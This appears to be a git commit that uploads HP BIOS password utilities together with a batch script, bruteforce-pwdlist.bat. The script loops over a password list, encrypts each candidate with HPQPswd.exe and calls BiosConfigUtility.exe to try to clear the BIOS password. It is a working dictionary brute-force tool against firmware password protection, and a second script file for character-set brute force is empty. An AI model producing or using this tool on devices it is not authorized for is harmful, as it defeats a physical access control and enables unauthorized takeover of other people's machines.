initial uplaod

This commit is contained in:
crt 2024-04-02 14:12:22 +02:00
commit 079d76983c
8 changed files with 29 additions and 0 deletions

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

BIN
BIOS-Util/HPQPswd.exe Normal file

Binary file not shown.

BIN
BIOS-Util/HpqPswd64.exe Normal file

Binary file not shown.

0
bruteforce-charset.bat Normal file
View File

29
bruteforce-pwdlist.bat Normal file
View File

@ -0,0 +1,29 @@
@echo off
setlocal
REM Define where the BIOS-Util files are
set HPQPswdPath=C:\Path\To\HPQPswd.exe
set BiosConfigUtilityPath=C:\Path\To\BiosConfigUtility.exe
REM Define the path used to save the password file and where the password list is
set EncryptedPasswordFile=C:\Path\To\EncryptedPassword.bin
set PasswordListFile=C:\Path\To\passwordlist.txt
REM Iterate over each password in the list
for /F "tokens=*" %%p in (%PasswordListFile%) do (
echo Trying password: %%p
REM Create the encrypted password file for the current password
"%HPQPswdPath%" /p"%%p" /f"%EncryptedPasswordFile%"
REM Attempt to reset the BIOS password using the current password
"%BiosConfigUtilityPath%" /cpwdfile:"%EncryptedPasswordFile%" /nowdfile:""
REM Optionally check for success and break the loop if succeeded
REM This would depend on the output of BiosConfigUtility.exe indicating success
)
REM Cleanup
del "%EncryptedPasswordFile%"
endlocal